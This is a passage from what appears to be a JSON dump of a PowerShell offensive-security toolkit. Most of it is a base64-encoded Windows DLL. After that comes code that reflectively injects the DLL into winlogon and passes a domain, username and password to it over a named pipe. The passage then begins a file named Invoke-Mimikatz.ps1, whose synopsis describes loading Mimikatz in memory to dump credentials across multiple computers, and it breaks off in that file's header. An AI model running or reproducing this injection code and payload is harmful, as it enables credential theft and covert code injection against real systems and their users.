AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6AAAAAAAAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQIECAAAAACkAwAAYIJ5giEAAAAAAAAApt8AAAAAAAChpQAAAAAAAIGf4PwAAAAAQH6A/AAAAACoAwAAwaPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQP4AAAAAAAC1AwAAwaPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQf4AAAAAAAC2AwAAz6LkohoA5aLoolsAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQH6h/gAAAABRBQAAUdpe2iAAX9pq2jIAAAAAAAAAAAAAAAAAAAAAAIHT2N7g+QAAMX6B/gAAAADAtgGAAQAAAAAAAAAAAAAAFAAAAAAAAACQbAGAAQAAAB0AAAAAAAAAlGwBgAEAAAAaAAAAAAAAAJhsAYABAAAAGwAAAAAAAACcbAGAAQAAAB8AAAAAAAAApGwBgAEAAAATAAAAAAAAAKxsAYABAAAAIQAAAAAAAAC0bAGAAQAAAA4AAAAAAAAAvGwBgAEAAAANAAAAAAAAAMRsAYABAAAADwAAAAAAAADMbAGAAQAAABAAAAAAAAAA1GwBgAEAAAAFAAAAAAAAANxsAYABAAAAHgAAAAAAAADkbAGAAQAAABIAAAAAAAAA6GwBgAEAAAAgAAAAAAAAAOxsAYABAAAADAAAAAAAAADwbAGAAQAAAAsAAAAAAAAA+GwBgAEAAAAVAAAAAAAAAABtAYABAAAAHAAAAAAAAAAIbQGAAQAAABkAAAAAAAAAEG0BgAEAAAARAAAAAAAAABhtAYABAAAAGAAAAAAAAACAJwGAAQAAABYAAAAAAAAAIG0BgAEAAAAXAAAAAAAAAChtAYABAAAAIgAAAAAAAAAwbQGAAQAAACMAAAAAAAAANG0BgAEAAAAkAAAAAAAAADhtAYABAAAAJQAAAAAAAAA8bQGAAQAAACYAAAAAAAAASG0BgAEAAACUJgAAAAAAAAAAAAAAAAAAIN0BgAEAAAAAAAAAAAAAACDdAYABAAAAAQEAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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q6Kr4qgirGKsoqzirSKtYq2ireKuIq5irqKu4q8ir2Kvoq/irCKwYrCisOKxIrFisaKx4rIismKyorLisyKwAIAEAoAAAADCmOKZApkimUKZYpmCmaKZwpnimgKaIppCmmKagpqimsKa4psCmyKbQptim4KbopvCm+KYApwinEKcYpyCnOKdAp0inUKdYp2CnaKdwp3iniKeQp3iogKiIqJCosKi4qFitYK1orXCtqK24rcit2K3orfitCK4YriiuOK5IrliuaK54roiumK6orriuyK7Yruiu+K4IrwAAADABAOQAAAAQqRipIKkoqXipiKmYqaipuKnIqdip6Kn4qQiqGKooqjiqSKpYqmiqeKqIqpiqqKq4qsiq2KroqviqCKsYqyirOKtIq1iraKt4q4irmKuoq7iryKvYq+ir+KsIrBisKKw4rEisWKxorHisiKyYrKisuKzIrNis6Kz4rAitGK0orTitSK1YrWiteK2IrZitqK24rcit2K3orfitCK4YriiuOK5IrliuaK54roiumK6orriuyK7Yruiu+K4IrxivKK84r0ivWK9or3iviK+Yr6ivuK/Ir9iv6K/4rwAAAEABAAgCAAAIoBigKKA4oEigWKBooHigiKCYoKiguKDIoNig6KD4oAihGKEooTihSKFYoWiheKGIoZihqKG4ocih2KHoofihCKIYoiiiOKJIoliiaKJ4ooiimKKooriiyKLYouii+KIIoxijKKM4o0ijWKNoo3ijiKOYo6ijuKPIo9ij6KP4owikGKQopDikSKRYpGikeKSIpJikqKS4pMik2KTopPikCKUYpSilOKVIpVilaKV4pYilmKWopbilyKXYpeil+KUIphimKKY4pkimWKZopnimiKaYpqimuKbIptim6Kb4pginGKcopzinSKdYp2ineKeIp5inqKewp8Cn0Kfgp/CnAKgQqCCoMKhAqFCoYKhwqICokKigqLCowKjQqOCo8KgAqRCpIKkwqUCpUKlgqXCpgKmQqaCpsKnAqdCp4KnwqQCqEKogqjCqQKpQqmCqcKqAqpCqoKqwqsCq0KrgqvCqAKsQqyCrMKtAq1CrYKtwq4CrkKugq7CrwKvQq+Cr8KsArBCsIKwwrECsUKxgrHCsgKyQrKCssKzArNCs4KzwrACtEK0grTCtQK1QrWCtcK2ArZCtoK2wrcCt0K3grfCtAK4QriCuMK5ArlCuYK5wroCukK6grrCuwK7QruCu8K4ArxCvIK8wr0CvUK9gr3CvgK+Qr6CvsK/Ar9Cv4K/wrwBQAQDIAAAAAKAQoCCgMKBAoFCgYKBwoICgkKCgoLCgwKDQoOCg8KAAoRChIKEwoUChUKFgoXChgKGQoaChsKHAodCh4KHwoQCiEKIgojCiQKJQomCicKKAopCioKKwosCi0KLgovCiAKMQoyCjMKNAo1CjYKNwo4CjkKOgo7CjwKPQo+Cj8KMApBCkIKQwpECkUKRgpHCkgKSQpKCksKTApNCk4KTwpAClEKUgpTClQKVQpWClcKWApZCloKWwpcCl0KXgpQAAAGABALAAAABgrWitcK14rYCtiK2QrZitoK2orbCtuK3Arcit0K3YreCt6K3wrfitAK4IrhCuGK4griiuMK44rkCuSK5QrliuYK5ornCueK6AroiukK6YrqCuqK6wrriuwK7IrtCu2K7gruiu8K74rgCvCK8QrxivIK8orzCvOK9Ar0ivUK9Yr2CvaK9wr3ivgK+Ir5CvmK+gr6ivsK+4r8CvyK/Qr9iv4K/or/Cv+K8AcAEAKAAAAACgCKAQoBigIKAooDCgOKBAoEigUKBYoGCgaKBwoAAAAIABAAwAAABYpwAAALABAHgAAAAwoDigIKIoojCiOKJAokiiUKJYomCiaKLgqfipCKoYqiiqOKpIqliqaKp4qoiqmKqoqriqyKrYquiq+KoIqxirKKs4q0irWKtoq3iriKuYq6iruKvQq+CroK+or7CvuK/Ar8iv0K/Yr+Cv6K/wr/ivAMABAPwAAAAAoAigEKAYoCCgKKAwoDigQKBIoFCgWKBgoGigcKB4oICgiKCQoJigoKCooLCguKDAoMig0KDYoOCg6KDwoAChCKEQoRihIKEooTChOKFAoUihUKFYoWChaKFwoXihgKGIoZChmKGgoaihsKG4ocChyKHQodih4KHoofCh+KEAogiiEKIYoiCiKKIwojiiQKJIolCiWKJgoqiiyKLoogijKKNgo3ijgKOIo5CjAKQIpBCkGKQgpCikMKQ4pECkSKRYpGCkaKRwpHikgKSIpJCkoKSopLCkuKTIp9Cn2KfgpwioMKhYqICoqKjIqPCoKKlgqZCpAAAAAAAAAAA=\"\n        [Byte[]]$Logon32Bit = [Convert]::FromBase64String($Logon32Bit_Base64)\n        [Byte[]]$Logon64Bit = [Convert]::FromBase64String($Logon64Bit_Base64)\n        Invoke-ReflectivePEInjection -Bytes32 $Logon32Bit -Bytes64 $Logon64Bit -ProcId $WinLogonProcessId\n\n\n        #Send domain, username, and password over the named pipe\n        [Byte[]]$DomainBytes = [System.Text.UnicodeEncoding]::Unicode.GetBytes($DomainName)\n        [Byte[]]$UsernameBytes = [System.Text.UnicodeEncoding]::Unicode.GetBytes($UserName)\n        [Byte[]]$PasswordBytes = [System.Text.UnicodeEncoding]::Unicode.GetBytes($Password)\n\n        $Pipe.WaitForConnection()\n\n        $Pipe.Write($DomainBytes, 0, $DomainBytes.Count)\n        $Pipe.WaitForPipeDrain()\n        Write-Verbose \"Sent domain\"\n        $Pipe.Write($UsernameBytes, 0, $UsernameBytes.Count)\n        $Pipe.WaitForPipeDrain()\n        Write-Verbose \"Sent username\"\n        $Pipe.Write($PasswordBytes, 0, $PasswordBytes.Count)\n        $Pipe.WaitForPipeDrain()\n        Write-Verbose \"Sent password\"\n        $Pipe.WriteByte($LogonTypeNum)\n        $Pipe.WaitForPipeDrain()\n        Write-Verbose \"Sent logontype\"\n        $Pipe.WriteByte($AuthPackageNum)\n        $Pipe.WaitForPipeDrain()\n        Write-Verbose \"Sent auth package\"\n\n        $RetMessageSize = 1024\n        [Byte[]]$ReturnMessageBytes = New-Object Byte[] $RetMessageSize\n        $ReadBytes = $Pipe.Read($ReturnMessageBytes, 0, $RetMessageSize)\n\n        $ReturnMessage = [System.Text.ASCIIEncoding]::ASCII.GetString($ReturnMessageBytes, 0, $ReadBytes)\n        Write-Output \"DLL OUTPUT: $($ReturnMessage)\"\n    }\n    finally\n    {\n        $Pipe.Dispose()\n    }\n}\n"
  },
  {
    "path": "Exfiltration/Invoke-Mimikatz.ps1",
    "content": "function Invoke-Mimikatz\n{\n<#\n.SYNOPSIS\n\nThis script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as\ndump credentials without ever writing the mimikatz binary to disk. \nThe script has a ComputerName parameter which allows it to be executed against multiple computers.\n\nThis script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.\n\nFunction: Invoke-Mimikatz\nAuthor: Joe Bialek, Twitter: @JosephBialek\nMimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: benjamin@gentilkiwi.com. Twitter @gentilkiwi\nLicense:  http://creativecommons.org/licenses/by/3.0/fr/\nRequired Dependencies: Mimikatz (included)\nOptional Dependencies: None\nMimikatz version: 2.0 alpha 